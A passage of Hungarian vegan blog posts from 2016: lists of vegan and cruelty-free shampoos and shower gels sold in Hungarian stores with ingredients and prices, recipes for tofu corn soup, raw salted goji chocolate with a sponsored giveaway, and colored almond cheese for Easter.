hatását. Vérszegénység, szédülés és magas Vata esetén ellenjavallott. Csökkenti a Kapha-t, Pitta-t és növeli a Vatat. Felhasznált szakirodalom:dr. David Frawley és dr. Vasant Lad: Gyógynövény jóga
Vegán samponok a magyar üzletekben és boltokban
2016. március 26. Vegán lettem
Vegán samponok széles választékával találkozhatsz a magyar hipermarketek és drogériák polcain. Összegyűjtöttem őket, hogy még vásárlás előtt informálódhass. Előző cikkemben azokat a vegán tusfürdőket gyűjtöttem össze neked, melyek a magyar boltokban kaphatóak. Sajnálatosan nem csak a tusfürdőket, hanem egyéb háztartási termékek nagy részét is állatokon tesztelik felesleges szenvedést okozva ezzel. Nincs ez másképpen a samponokkal sem. Olvasd el a PETA által készített alábbi cikket, melyben bemutatják nagy vonalakban, hogy min mennek keresztül ezek az élőlények. Erre a szenvedésre és kínzásra semmi szükség! Válassz vegán és erőszakmentes samponokat! Amikor erőszakmentes – azaz cruelty free vagy non tested on animals – és vegán samponokat keresel, érdemes megnézni, hogy milyen logó van az adott terméken. Vannak nyuszis logók, melyek az erőszakmentességet jelölik és V alapú vegán szimbólumok, melyek a termék vegán mivoltát jelölik. Az a legbiztosabb, ha olyan terméket választasz, melyen mindkét jelölés megtalálható, így egészen biztos, hogy erőszakmentes és egyben vegán sampont vásárolsz. Az elephant room cikkében olvashatsz ezen jelölésekről bővebben. Alább pedig ABC sorrendben találhatod a Magyarországon fellelhető erőszakmentes és vegán samponokat. Nő és férfi erőszakmentes/vegán samponok Alterra vegán samponok Összetevők: (típustól függően) Aqua, Lauryl Glucoside, Sodium Coco-Sulfate, Cocamidopropyl Betaine, Lauroyl Sarcosine, Glycerin, Carica Papaya Fruit Extract, Bambusa Arundinacea Stem Extract, Mangifera Indica Extract, Hydroxypropyl Guar Hydroxypropyltrimonium Chloride, Panthenyl Ethyl Ether, Alcohol Denat, Parfum, Limonene, Linalool, Geraniol, Citral i Típusok: Papaya és bambusz, Gránátalma és aloe vera, Barack, Mandula, Makadámdió és füge, Koffein, Olíva és lótuszvirág, Natúr Hol kapod? Rossmann Ár: kb. 700 – 2000 Ft / 250ml Dermomed argán és keratin erőszakmentes sampon Összetevők: Aqua, Sodium Laureth Sulfate, Sodium Chloride, Cocamidopropyl Betaine, Hydrolyzed Keratin, Panthenol, Lauramine Oxide, Polyquaternium-7, Styrene/Acrylates/Acrylonitrile Copolymer, Citric Acid, Tetrasodium EDTA, Benzyl Alcohol, Limonene, Coumarin, Methylchloroisothiazolinone, Methylisothiazolinone Hol kapod? DM Ár: kb. 1000 Ft / 1000ml Dr. Organic vegán samponok Összetevők: (típustól függően) Aloe Barbadensis Leaf Extract, Water, Sodium Lauroyl Sarcosinate, Sodium Cocoamphoacetate, Cocamidopropyl Betaine, Shea Butteramidopropyltrimonium Chloride, Coco-Glucoside, Glyceryl Oleate, Parfum, Sorbitan Sesquicaprylate, Olea Europaea Leaf Extract, Citrus Medica Limonum Peel Extract, Vitis Vinifera Leaf Extract, Thymus Vulgaris Flower/Leaf Extract, Foeniculum Vulgare Seed Extract, Potassium Sorbate, Ribes Nigrum Seed Oil, Ascorbic Acid, Sodium Hydroxymethylglycinate, Citric Acid, Amyl Cinnamal, Benzyl Salicylate, Geraniol, Hydroxycitronellal, Linalool Vegán típusok: Gránátalma, Teafa, Marokkói argán olaj, Olívás, E-vitaminnal, Aloe vera, Szűz kókuszolajjal Hol kapod? Müller, DM, Rossmann Ár: kb. 2800 Ft / 250ml Helia-D Regenero erőszakmentes sampon Összetevők: Aqua, Sodium laureth sulfate, Helia-D regenero (aqua, alcohol, quercus petraea, agrimonia eupatoria, matricaria chamonilla, calendula officinalis, hypericumperforatum, melissa officinalis, equisetum arvense, rosacanina, urtica diocia, taraxacum officinale, achilleamillefolium, juglans regia, salvia sclarea, sinapis alba, fenoeniculum vulgare, mentha piperita, plantaginisfolium, cichori herba, rosmarinus officinalis, menthacrispa, melilotus officinalis, betula verrucosa, verbenea officinalis, shymphytum officinale, hyssopi herba, lavandula angustifolia), Glycerin, Cocamide DEA, Polysorbate 20, Sodium chloride, Cocamidopropyl betaine, Propylene glycol, Cananga odorata oil, Parfum, Citric acid, Disodium EDTA, Limonene, Sodium hydroxide, Hexylcinnamic aldehyde, Benzyl alcohol, Linalool, Methylchloroisothiazolinone, Methylisothiazolinone Hol kapod? Tesco Ár: kb. 1400 Ft / 250ml Intecto Naturals Coconut erőszakmentes sampon Összetevők: (típustól függően) Aqua, Sodium Laureth Sulfate, Sodium Chloride, Cocamide DEA, Cocamidopropyl Betaine, Glycerin, Glycol Distearate, Steareth-4, Cocos Nucifera Oil, Polyquaternium-10, Parfum, Sodium Carbonate, Sodium Hydroxide, Sodium Benzoate, Citric Acid Hol kapod? DM Ár: kb. 1000 Ft / 500ml Jean & Len Philosophie vegán samponok Összetevők: (típustól függően) Aqua, sodium coco-sulfate, coco-glucoside, decyl glucoside, sodium chloride, glycerin, glyceryl oleate, sodium cocoyl glutamate, dicaprylyl ether, citric acid, parfum*, hydrolyzed wheat protein, sodium benzoate, potassium sorbate Típusok: Színvédő, Selymes csillogás Hol kapod? Müller Ár: kb. 1600 Ft / 250ml Lavera vegán samponok Összetevők: (illattól függően) Aqua, Sodium Coco-Sulfate, Lauryl Glucoside, Betaine, Maris Sal / Sea Salt, Aloe Barbadensis Leaf Juice Extract, Rosa Centifolia Flower Extract, Triticum Vulgare Bran Extract, PCA Glyceryl Oleate, Lauroyl Lysine, Sodium Cocoyl Glutamate, Disodium Cocoyl Glutamate, Hydrolyzed Soy Protein, Radish Root Ferment Filtrate, Sodium Phytate, Citric Acid, Alcohol, Parfum, Limonene, Geraniol, Linalool, Citral Típusok: Basis sensitive, Color & shine, Mangótejes, Narancstejes, Almás, Tengeri algás, Édesmandula, Men spa, Rózsatejes, Almatejes, Citromtejes Hol kapod? Müller Ár: kb. 1200-1600 Ft / 250ml Logona vegán samponok Összetevők: (illattól függően) Aqua, Glycerin, Aloe Barbadensis Leaf Juice, Disodium Cocoyl Glutamate, Sodium Cocoyl Glutamate, Glyceryl Oleate, Xanthan Gum, Citric Acid, Sodium PCA, Olea Europaea Oil, Phytic Acid, Limonene, Linalool, Citral, Geraniol, Citronellol, Alcohol Denat, Coco-Glucoside, Verbena Officinalis Extract, PCA Ethyl Cocoyl Arginate, Parfum Típusok: Argán olajjal, Aloe vera Hol kapod? Müller Ár: kb. 1600 Ft / 250ml Neobio vegán samponok Összetevők: (típustól függően) Aqua, Sodium Coco-Sulfate, Lauryl Glucoside, Coco-Glucoside, Inulin, PCA Glyceryl Oleate, Betaine, Citric Acid, Sodium Chloride, Aloe Barbadensis Leaf Juice, Arginine, Caffeine, Glycerin, Potassium Sorbate, Betula Alba Leaf Extract, Phytic Acid, PCA Ethyl Cocoy Arginate, Parfum, Limonene, Linalool Típusok: Fehérliliommal és moringával, Gingko és bambusz kivonattal, Borókával és rozmaringgal, Volumen Hol kapod? Müller Ár: kb. 1500 Ft / 250ml Original Source vegán tusfürdők, hajra is Összetevők: (típustól függő) Aloe barbadensis leaf juice, Aqua, Cocamidopropyl betaine, Sodium cocoamphoacetate, Sodium lauroyl sarcosinate, Caprylyl/Capryl glucoside, Disodium lauryl sulfosuccinate, Coco glucoside, Glyceryl oleate, Lauryl glucoside, Cocos nucifera fruit extract, Carica papaya (papaya) fruit extract, Mangifera indica (mango) fruit extract, Theobroma cacao (cocoa) seed extract, Garcinia mangosteena (mangosteen) fruit extract, Ficus carica (fig) fruit extract, Citrus aurantium dulcis, Citrus aurantium bergamia (bergamot) fruit oil, Citrus limon peel oil, Gamma undecalactone, Maltol, 3-hexenol, Gamma octalactone, Diacetyl natural, Sodium hydroxymethylglycinate, Potassium sorbate, Ascorbic acid, Citric acid, Limonene Vegán típusok: Málna és vanília, Teafa és mentol, Lime, Kókusz, Narancsolaj és gyömbér, Levendula, Csokoládé és menta, Menta és teafa, Citrom és teafa, Grapefruit, Kókusz Hol kapod? DM, Müller Ár: kb. 600 Ft / 250ml Sante Naturkosmetik vegán samponok Összetevők: (típustól függően) Aqua, Coco-Glucoside, Alcohol, Glycerin, Disodium Cocoyl Glutamate, Sodium Cocoyl Glutamate, Glyceryl Oleate, Sodium PCA, Xanthan Gum, Triticum Vulgare Bran Extract, Tilia Cordata Flower Extract, Arginine, Hydrolyzed Silk, Parfum, Phytic Acid, Citric Acid, Citral, Limonene, Linalool, CI 75810 Típusok: Natúr, Narancs és kókusz, Gingko és oliva, Koffeinnel és akai bogyóval, Sztilvával és kardamommal, Goji és sárgadinnye, Búzakorpával, Rósza, Lávaföld Hol kapod? Müller Ár: kb. 2500-4000 Ft / 250ml – 1000ml Speick Men vegán tusfürdő és sampon Összetevők: Aqua, Sodium C14-16 Olefin Sulfonate, Cocamidopropyl Betaine, Glycerin, Sucrose Cocoate, C12-13 Alkyl Lactate, Hydrolyzed Wheat Protein, Hydrolyzed Wheat Gluten, Panthenol, Valeriana Celtica Extract, Salvia Officinalis Extract, Parfum, Sodium Sulfate, Sodium Chloride, Sodium Benzoate, Potassium Sorbate, Citric Acid, Alcohol ,Citral, Limonene, Linalool Hol kapod? Müller Ár: kb. Ft / 250ml Terra Naturi vegán samponok Összetevők: (típustól függően) Aqua, Sodium Coco-Sulfate, Lauryl Glucoside, Glycerin, Betaine, Maris Sal, Hippophae Rhamnoides Fruit Extract, Avena Sativa Straw Extract, Sodium PCA, Hydrolyzed Wheat Protein, Hydrolyzed Corn Protein, Hydrolyzed Soy Protein, Radish Root Ferment Filtrate, Sodium Cocoyl Glutamate, Disodium Cocoyl Glutamate, Zinc PCA, Xylitylglucoside, Anhydroxylitol, Xylitol, Sodium Phytate, Alcohol, Parfum, Limonene Típusok: Dúsító, Vitamin és fény, Festett hajra Hol kapod? Müller Ár: kb. 700 Ft / 250ml Gyermek erőszakmentes/vegán samponok Alverde Baby vegán samponok és tusfürdő Összetevők: Aqua, Lauryl Glucoside, Glycerin, Parfum, Disodium Cocoyl Glutamate, Sodium Cocoyl Glutamate, Polyglyceryl-10 Laurate, Calendula Officinalis Flower Extract, Prunus Amygdalus Dulcis Oil, Hydrogenated Lecithin, Maris Sal / Sea Salt, Betaine, Sodium PCA, Phytic Acid, Citric Acid Típusok: Natúr, Shea vajjal Hol kapod? DM Ár: kb. 800-2000 Ft / 250ml Kneipp Naturkind gyermek erőszakmentes sampon és tusfürdő Összetevők: (típustól függően) Aqua, Sodium Laureth Sulfate, Cocamidopropyl Betaine, Glycerin, Coco-Glucoside, Sodium Cocoyl Glutamate, Hylocereus Undatus Fruit Extract, Hamamelis Virginiana, Simmondsia Chinensis Seed Oil, Citrus Aurantium Dulcis Peel Oil, Panthenol, Limonene, Eugenol, Citronellol, Sodium Levulinate, Sodium Anisate, Parfum, Glyceryl Oleate, Sodium Chloride, Glycol Distearate, Peg-18 Glyceryl Oleate, Citric Acid, Hydroxypropyl Oxidized Starch PG-Trimonium Chloride, Starch Hydroxypropyltrimonium Chloride, Sodium Phytate, Lactic Acid, Sodium Lactate, Urea, Tocopherol, CI 47005, CI 42051 Típusok: Sárkányharcos, Tenger hercegnője Hol kapod? DM Ár: kb. 1000 Ft / 250ml Logona kids vegán sampon és tusfürdő Összetevők: Aqua, Lauryl Glucoside, Glycerin, Parfum, Disodium Cocoyl Glutamate, Sodium Cocoyl Glutamate, Polyglyceryl-10 Laurate, Calendula Officinalis Flower Extract, Prunus Amygdalus Dulcis Oil, Hydrogenated Lecithin, Maris Sal / Sea Salt, Betaine, Sodium PCA, Phytic Acid, Citric Acid Hol kapod? Müller Ár: kb. 2700 Ft / 250ml Amennyiben tudsz olyan termékről, mely megfelel a cikkben leírtaknak, de mégsem található meg benne, úgy kérlek írd meg kommentben és kiegészítem. A vegán samponok bejegyzést fél évente tervezem frissíteni az éppen aktuális termékekkel kiegészítve. Utolsó frissítés 2016 március.
Tofus kukoricaleves
Még Magyarországról hoztunk pár kiló tofut, mikor januárban otthon voltunk, s annak egy jó része már fel lett használva, de van még néhány "rúd", ami ott pihen a fagyasztóban. Férjem nagyon szereti amúgy a kínai kukoricalevest, meg a tofut is, ebből jött az ötlet, hogy a kettőt ötvözhetném, így jött össze ez a leves. 2in1 amolyan kínai módra. :) Ezzel különlegessé teheted a húsvéti menüt is akár. A recept: Hozzávalók: - 2-3 bögre mirelit kukorica - 1 fej vöröshagyma - 1 közepes krumpli - 1 kis csokor petrezselyem vagy korianderlevél - 1 l víz - 2-3 gerezd fokhagyma - ízlés szerint só - 20 dkg füstölt tofu - sárga pritamin paprika (opcionális) Elkészítés: Az apróra vágott hagymát kevés vízen megdinszteljük, majd ebbe kockázzuk bele a krumplit, s felöntjük egy kevés vízzel, megsózzuk. Amikor megpuhult, 1 kis bögrényi kukoricát leszámítva beletesszük a mirellite kukoricát. Amikor megfőtt a krumpli és a kukorica, összeturmixoljuk őket. Ezután hozzáadjuk a megmaradt kukoricát, az apróra vágott petrezselymet vagy koriandert, 2-3 gerezd összezúzott fokhagymát, a felaprított paprikát, és a feldarabolt tofut. Egyet forr és lezárjuk. Melegen tálaljuk.
Nyers sós-goji bogyós csokoládé (vegán) + Nyereményjáték egy nagyon csokis csomagért
2016. március 19. Zizi kalandjai
Régóta készültem már nyers csokoládét csinálni… el is terveztem, hogy lesz citromos, mogyorós, sós… aztán megszületett ez a sós-goji bogyós-kakaóbab töretes változat. Nagyon sokféle verzió lehetséges, tényleg az ízlésetekre bízom, hogy ti mit szórtok az elkészült csokoládé tetejére. Jelen esetben a goji bogyó adja a savasságot és gyümölcsösséget, a kakaóbab töret a ropogósságot, a só pedig – jelen esetben Maldon só, de bármilyen nagyobb szemcsés só megteszi – csak ellensúlyozza az édességet… amúgy is imádom a sós csokoládét. Datolyasziruppal édesítettem, ami kicsit karakteres ízű, szóval, ha valaki nem szereti a datolyát, vagy kevésbé “intenzív” édesítést szeretne, az használjon inkább juharszirupot. A feltéteken és a datolyaszirupon kívül a csokoládé alapját a kakaóvaj és a nyers kakaópor adja (természetesen elkészíthető nem nyers kakaóporból is). A kakaóvaj a kakaófa terméséből,vagyis a kakaóbabból kinyert nyers és tiszta növényi zsír. Igen gazdag E-vitamin forrás, ami hozzájárul a sejtek megvédéséhez az oxidatív stressz ellen. A kakaóvaj a kakaóporral ellentétben minimális mennyiségű teobromint és koffeint tartalmaz. A kakaóporban lévő magnézium és vas csökkenti a fáradtságérzetet, míg a cink, egy antioxidáns, megvédi a sejteket az oxidatív stressz ellen és hozzájárul az egészséges bőr-, haj- és köröm növekedéshez. A nagy csokoládé táblából lehet kisebb darabokat törni, becsomagolni és húsvétra ajándékba adni csokinyúl vagy csokitojás helyett. Nyers sós-goji bogyós csokoládé Hozzávalók: – 175 g kakaóvaj – 100 g nyers kakaópor – 150-160 ml datolyaszirup vagy juharszirup – goji bogyó – kakaóbab töret – néhány csipet nagyobb szemű só (Maldon sót használtam) Tegyük a kakaóvajat egy hőálló tálba, a tálat pedig egy lábassal teli víz fölé (úgy, hogy a tál alja ne érjen bele a vízbe). Közepes láng felett melegítsük a vizet és felette a kakaóvajat, lassan kevergetve, amíg a vaj teljesen felolvad. A felolvadt vajat vegyük le a lábas tetejéről és tegyük bele a kakaóport (szitálva) és a datolyaszirupot. Lassan kevergetve várjuk meg, amíg minden összeolvad gyönyörű, fényes csokoládévá. Béleljünk ki egy kb. 20*30 cm-es tepsit vagy dobozt sütőpapírral és öntsük bele a csokoládét. Szórjunk a tetejére goji bogyót, kakaóbab töretet és sót. Tegyük hűtőbe legalább két órára, várjunk, amíg megkeményedik és törhető lesz kisebb falatokra. ***** A kakaóvajat, kakaóport, kakaóbab töretet és goji bogyót a {Planetbio} biztosította a recepthez. A véleményem csakis a sajátom. Jó hír, hogy a Planetbio felajánlotta, hogy kedvezménykupont biztosít a Zizi kalandjai olvasóinak! Minden online vásárlás végösszegéből 10% kedvezményt nyújt a cég. A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI. Ráadásul, aki a 300 grammos kakaóport és a 300 grammos kakaóvajat is megrendeli, az egy szilikon bonbon formát kap ajándékba. ***** NYEREMÉNYJÁTÉK! Nyeremény : egy 10 ezer Ft értékű ajándékcsomag a Planetbio Magyarországtól, amelyben van 1 db nyers kakaópor (150 g), 1 db kakaóvaj (150 g), 1 db kakaóbab töret (150 g), 1 db goji bogyó (150 g) és 1 db szilikon bonbon forma. Írjátok meg ide a bejegyzés alá kommentben, hogy ti mivel ízesítenétek a csokoládét. Extra pontért (hogy a kalapba kétszer kerüljön bele a nevetek) lehet lájkolni a Planetbio Magyarország Facebook oldalát. Szabályok : Kérem, hogy az alábbi formula/”táblázat” minden pontját értelemszerűen töltsétek ki! A játék 2016. március 19-től 2016. március 22-ig tart. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2016. március 23-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek a Planetbio Magyaroszág postázza magyarországi címre. a Rafflecopter giveaway
Vegán tusfürdők a magyar üzletekben és boltokban
2016. március 13. Vegán lettem
Vegán tusfürdők egyre nagyobb választékával találkozhatsz már nagyobb hipermarketekben és drogériákban is! Körbejártam ezeket a boltokat és összeszedtem nektek őket. Nem sokan tudják, hogy a háztartási termékek zömének gyártása bizony felesleges szenvedéssel jár. A tusfürdők, dezodorok, takarítószerek összetevőit és a kész termékeket is ártatlan állatokon tesztelik. Majmok, nyulak, macskák, kutyák, egerek ezrei halnak meg kínok között minden évben az ilyen értelmetlen évekig tartó tesztelések miatt. 2015-ben számos állatjogi siker között üdvözölhettük az ilyen jellegű tesztek tiltását számos országban. Nem szükséges ezen állatok szenvedése! Válassz cruelty free vagy vegán tusfürdőket! Amikor vegán tusfürdőt keresel érdemes odafigyelni a jelzésekre, ugyanis több logóval találkozhatsz a piacon. Alapvetően vannak a “cruelty free” vagy “non tested on animals” – erőszakmentes – tusfürdők, melyeket nem teszteltek állatokon, valamint vannak a kifejezetten vegán tusfürdők, melyeket nem teszteltek állatokon és állati eredetű összetevőket sem tartalmaznak. Ezeknek pontos leírását az alábbi cikkben találod, alább pedig ABC sorrendben a Magyarországon kapható cruelty free és vegán tusfürdőket. Női és férfi erőszakmentes/vegán tusfürdők Alterra Naturkomsetiks vegán tusfürdő Összetevők: Aqua, Alcohol, Glycerin, Coco glucoside, Cocos nucifera fruit, Xanthan gum, Glyceryl oleate, Silica, Disodium cocyl glutamate, Carica papaya fruit extract, Aloe barbadensis leaf powder, Parfum, Limonene, Sodium cocoyl glutamate, Citric acid Vegán típusok: Papaya és kókusz Hol kapod? Rossmann Ár: kb. 900 Ft Alverde vegán tusfürdők Összetevők: (illattól függő) Aqua, Sodium Coco-Sulfate, Glycerin, Lauryl Glucoside, Sodium Lactate, Maris Sal, Sodium Cocoyl Glutamate, Disodium Cocoyl Glutamate, Olea Europaea Fruit Extract*, Aloe Barbadensis Leaf Juice*, Calendula Officinalis Flower Extract*, Alcohol*, Parfum**, Limonene**, Linalool**, Citral**, Citronellol**, Geraniol** Típusok: Grapefruit és bambusz, Olíva és aloe vera Hol kapod? DM Ár: kb. 600 Ft Bettina Barty erőszakmentes tusfürdők Összetevők: (típustól függő) Aqua, Sodium laureth sulfate, Cocamidopropyl betaine, Sodium chloride, Coco-glucoside, Parfum, Glycreyl oleate, Citric acid, Sodium benzolate, Styrene/acrylates copolymer, Alantoin, Potassium sorbate, Peg-120 methyl glucose dioleate, Polyquaternium-7, Hexyl cinnamal, Tetrasodium edta, Glycerin, Limonene, Pyrus malus juice, CI 15510, CI 16035. Típusok: Alma és fahéj, kókusz és lime, málna és kivi Hol kapod? Rossmann Ár: kb. 1500 Ft / 500ml CD erőszakmentes tusfürdő Összetevők: Aqua, Sodium laureth sulfate, Glycerin, Cocamidopropyl betaine, Sodium Chloride, Parfum, Nympaea alba flower extract, Coco-glucoside, Glyceryl oleate, Hydroxypropyl, Guar hydroxypropyltrimonium chloride, Citric acid, Sodium benzoate, Limonene, Hexyl Cinnamal, Linalool Hol kapod? Rossmann, Tesco Ár: kb. 650 Ft Dermax erőszakmentes tusfürdő Összetevők: Aqua, Sodium laureth sulfate, Cocamidopropyl betaine, Cocamide DEA, Glycerin, PEG-7 glyceryl cocoate, Polyquaternium 7, Sodium lactate, Allantoin, Phenoxyethanol, Citric acid, Sodium benzoate, Tetrasodium EDTA, Sodium chloride Hol kapod? DM, Tesco Ár: kb. 800 Ft Dr. Organic vegán tusfürdők Összetevők: (illattól függő) Aloe barbadensis leaf juice, Aqua, Cocamidopropyl betaine, Sodium cocoamphoacetate, Sodium lauroyl sarcosinate, Caprylyl/Capryl glucoside, Disodium lauryl sulfosuccinate, Coco glucoside, Glyceryl oleate, Lauryl glucoside, Cocos nucifera fruit extract, Carica papaya (papaya) fruit extract, Mangifera indica (mango) fruit extract, Theobroma cacao (cocoa) seed extract, Garcinia mangosteena (mangosteen) fruit extract, Ficus carica (fig) fruit extract, Citrus aurantium dulcis, Citrus aurantium bergamia (bergamot) fruit oil, Citrus limon peel oil, Gamma undecalactone, Maltol, 3-hexenol, Gamma octalactone, Diacetyl natural, Sodium hydroxymethylglycinate, Potassium sorbate, Ascorbic acid, Citric acid, Limonene Típusok: Gránátalma, Szűz kókuszolaj, Teafaolaj, Olívaolaj, Aloe vera Hol kapod? DM, Tesco, Müller Ár: kb. 1900 Ft Isana vegán tusfürdők Összetevők: (illattól függő) Aqua, Sodium laureth sulfate, Cocamide DEA, Cocamidopropyl betaine, PEG-7 glyceryl cocoate, Mentha avensis oil, Panthenol, Glycerin, Critic acid, Parfum, Sodium chloride, Sodium benzoate, Potassium sorbate, Styrene/Acrylates copolymer, Coco-glucoside, Testrasodium glutamate diacetate, Benzoic acid, Sodium hydoxide, Sodium polynapthalenesulfonate, Citral, Limonene, Linalool, CI-11680 Vegán típusok: Lady Lemon és Mademoiselle Raspberry Hol kapod? Rossmann Ár: kb. 500 Ft / 500ml Kneipp vegán habfürdők Összetevők: (illattól függő) Aqua, Sodium laureth sulfate, Cocamidopropyl betaine, Parfum, Peg-40 sorbitan peroleate, Peg-18 glyceryl oleate, Coco-glucoside, Glycerin, Papaver orientale seed oil, Cannabis sativa seed oil, Citrus nobilis peel oil, Citrus aurentium bergamia fruit oil, Olibanum, Limonene, Geraniol, Citric acid, Tocopherol, CI-16255, CI-42090 Vegán típusok: Vörös mák és kender, Levendula és vanília, Gránátalma és amaránt olaj, Rebarbara és rózsa, Maracuja és grapefruit, Eukaliptusz és menta Hol kapod? Müller, Tesco Ár: kb. 1500 Ft Lavera basis sensitive vegán tusfürdők Összetevők: Aqua (Water), Sodium Coco-Sulfate, Ammonium lauryl sulfate, Lauryl glucoside, Maris sal, Betaine, Calendula officinalis flower extract, Equisetum arvense leaf extract, Algae, Melissa officinalis flower extract, PCA glyceryl oleate, Lauroyl lysine, Alcohol, Parfum, Limonene, Geraniol, Linalool, Citral, Citronellol, Hol kapod? Müller Ár: kb. 1400 Ft Neobio vegán tusfürdők Összetevők: (típustól függő) Aqua (Water), Sodium Coco-Sulfate, Coco-Glucoside, Lauryl Glucoside, Glycerin, Betaine, Aloe Barbadensis Leaf Juice*, Citric Acid, Caffeine*, Camellia Sinensis Leaf Extract*, Potassium Sorbate, Sodium Chloride, PCA Ethyl Cocoyl Arginate, Parfum (Essential Oils), Limonene Kálium-szorbáttal tartósítva *ellenőrzött bio termesztésből Vegán típusok: Koffeines zöld teás, Narancsos lime-os, Gránátalmás orchideás Hol kapod? Rossmann, Müller, nagyobb DM-ek Ár: kb. 1000 Ft Original Source vegán tusfürdők Összetevők: (típustól függő) Aloe barbadensis leaf juice, Aqua, Cocamidopropyl betaine, Sodium cocoamphoacetate, Sodium lauroyl sarcosinate, Caprylyl/Capryl glucoside, Disodium lauryl sulfosuccinate, Coco glucoside, Glyceryl oleate, Lauryl glucoside, Cocos nucifera fruit extract, Carica papaya (papaya) fruit extract, Mangifera indica (mango) fruit extract, Theobroma cacao (cocoa) seed extract, Garcinia mangosteena (mangosteen) fruit extract, Ficus carica (fig) fruit extract, Citrus aurantium dulcis, Citrus aurantium bergamia (bergamot) fruit oil, Citrus limon peel oil, Gamma undecalactone, Maltol, 3-hexenol, Gamma octalactone, Diacetyl natural, Sodium hydroxymethylglycinate, Potassium sorbate, Ascorbic acid, Citric acid, Limonene Vegán típusok: Málna és vanília, Teafa és mentol, Lime, Kókusz, Narancsolaj és gyömbér, Levendula, Csokoládé és menta, Menta és teafa, Citrom és teafa, Grapefruit, Kókusz Hol kapod? DM, Müller Ár: kb. 600 Ft / 250ml Sante Naturkosmetik vegán tusfürdők Összetevők: (típustól függő) Aqua, Lauryl Glucoside , Coco-Glucoside , Sodium Coco-Sulfate, Aloe Barbadensis Leaf Juice, Glycerin, Inulin, Sodium Chloride, Glyceryl Oleate , Sorbitol , Citric Acid, Polyglyceryl-10 Laurate , Betaine , Sodium Cocoyl Glutamate, Disodium Cocoyl Glutamate, Lycium Barbarum Fruit Extract, Citrus Limon Peel Extract, Levulinic Acid, p-Anisic Acid, Phytic Acid, PCA Ethyl Cocoyl Arginate , Sodium Levulinate , Parfum , Limonene , Citral Típusok: Goji bogyó és citromkivonat, Gránátalma kivonattal, Mályvavirág kivonattal, Sheavajjal, Citrom és papaya kivonattal Hol kapod? DM, Müller Ár: kb. 2000 Ft Speick men vegán tusfürdők Összetevők: Aqua, Sodium C14-16 Olefin Sulfonate, Cocamidopropyl Betaine, Glycerin, Sucrose Cocoate, C12-13 Alkyl Lactate, Hydrolyzed Wheat Protein, Hydrolyzed Wheat Gluten, Panthenol, Valeriana Celtica Extract, Salvia Officinalis Extract, Parfum, Sodium Sulfate, Sodium Chloride, Sodium Benzoate, Potassium Sorbate, Citric Acid, Alcohol ,Citral, Limonene, Linalool Hol kapod? Müller Ár: kb. Ft Terra Naturi vegán tusfürdők Összetevők: Aqua, Helianthus Annuus Hybrid Oil, Coco-Glucoside, Cetearyl Alcohol, Glyceryl Stearate Citrate, Glycerin, Caprylyl Caprylate, Tocopherol, Punica Granatum Seed Oil, Parfum, Disodium Cocoyl Glutamate, Chondrus Crispus Powder, Polyglyceryl-10 Laurate, Xanthan Gum, Sodium Cocoyl Glutamate, Sodium Cocoate, Sodium Benzoate, Glyceryl Caprylate, Potassium Sorbate, Limonene, Linalool, Citric Acid, Sodium Chloride Vegán típusok: Aloe vera és kókusz, Narancs és menta, Vadrózsa és mandula, Lime, Gránátalma, Kakaó és vanília Hol kapod? Müller Ár: kb. 600 Ft The Body Shop erőszakmentes tusfürdők A The Body Shop cég büszkén vállalja, hogy semmilyen termékét és termékeinek összetevőit sem tesztelik állatokon, ezzel az értelmetlen állatkínzás ellen foglalva állást. Ugyanakkor, ha vegán vagy érdemes odafigyelned, mivel számos termékük tartalmaz állati összetevőket, főleg mézet. Hol kapod? The Body Shop Ár: kb. 1600 Ft és 4500 Ft között Treaclemoon vegán tusfürdők Összetevők: (illattól függő) Aqua, Sodium laureth sulfate, Cocamidopropyl betaine, Cocamide DEA, Sodium chloride, Glycerin, Pardum, Phenoxyethanol, Sodium benzoate, Potassium sorbate, Styrene/acrylates copolymer, Citric acid, Xanthan gum, Polyquaternium-7, Coumarin. Vegán típusok: Kókusz, eper, vanília, levendula, mangó, citrom Hol kapod? Müller, Tesco Ár: kb. 800 Ft / 500ml Amennyiben hiányosnak találod a cikket, illetve tudomásod van egyéb vegán vagy erőszakmentes tusfürdőről, kérlek jelezd felém! A Vegán tusfürdők cikket körülbelül fél évente tervezem frissíteni árakkal és termékekkel. Legutolsó frissítés 2016 március.
Színes mandulasajt húsvétra
2016. március 13. Gitta nyersétel blogja
A nyerskonyhában nem használunk, nem festünk tojást, de a hangulat kedvéért készíthetünk színes ételeket, amik méltán aratnak nagy sikert, ha vendégeink meglátják. Színező anyag lehet bármi, fűszerek, szuperételek, friss vagy aszalt zöldségek, prémium szárítmányok. Elég csak körülnézni a konyhában, biztosan találunk színes zöldségeket, szuperétel porokat, amik alkalmasak lesznek a fehér sajtgolyót szépen megszínezni. Színes gombócok, tojás helyett Hozzávalók 12 darab kisebb sajtgolyóhoz (kb 2 adag) 20 dkg hámozott (blansírozott) mandula 1 liter tiszított víz 1 evőkanál inaktív sörélesztő pehely, 1 evőkanál utifűmag héj 1 teáskanál só a színezéshez cékla, sárgarépa, curry, pirospaprika, spirulina, bűzafű, stb... Mandulasajtot többféleképpen is elő lehet állítani. A Valentin napi receptek között már találkozhattunk az egyik fajtával. Ez most egy másik megközelítés, és azért, mert az így kapott sajt sokkal világosabb, szinte majdnem fehér, amit sokkal jobban be lehet színezni a különböző fűszerekkel, zöldségekkel. káprázatos színekA mandulából először mandulatejet készítünk: simára, teljesen simára turmixoljuk a mandulát először annyi vízzel, amennyi éppen ellepi. Ha már nincsenek benne darabok, akkor felönthetjük a maradék vízzel. Nylon szűrőzsákkal leszűrjük, jó erősen kinyomkodjuk... A mandulatejből naranccsal, sárgarépával káprázatos színű ital készíthető :) Ha nem készítjük el a narancsos-répás receptet, akkor a mandulatejet hígíthatjuk még egy kis vízzel, mert így elég tömény, és édesíthetjük mézzel, ízesíthetjük vaníliával, lucumával, macával. Az ételkészítő jól megérdemelt jutalma, hogy a konyhában végzett kreatív munkájáért cserébe elkortyolgathatja ezt a nagyon finom italt, ami tulajdonképpen a mandulasajt előállításának egy mellékterméke :) szerencsére :) A visszamaradt mandulapépet ízesítjük sóval, sörélesztő pehellyel, és belekeverjük az utifűmag héjt is. A masszát kicsit félretesszük. Nézzünk körül otthon, mivel tudunk színesíteni - élénk rózsaszín: cékla (friss vagy porított változat is megfelel) - sárga: kurkuma (egyre népszerűbb fűszer) - sárga egy másik árnyalata: curry por (egy kurkuma alapú fűszerkeverék, 